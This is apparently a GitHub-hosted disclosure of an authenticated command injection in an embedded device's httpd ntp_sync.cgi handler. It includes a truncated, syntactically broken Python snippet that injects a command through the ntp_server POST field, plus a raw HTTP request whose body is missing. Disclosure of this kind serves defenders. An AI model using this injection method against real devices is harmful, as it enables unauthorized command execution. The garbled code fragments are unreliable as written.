Skip to content
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
47 lines (34 sloc) 1.45 KB

command injection

there is a command injection vulnerability that can cause any system command to be executed after user authentication 

download link:

Vulnerability location: file:  /sbin/httpd  function:sub_414134 ntp_sync.cgi

The attacker calls this function by sending a post packet to the http://ip/ ntp_sync.cgi page.

The program will call the system function with the value of ntp_server in the post package.

Post package structure
postData = {
	' ntp_server ':cmd
response =' ',data=postData)

Http message:
POST /ntp_sync.cgi  HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 26



This is the result I got from the qemu simulation environment. The input parameters are executed by the system function.


You can’t perform that action at this time.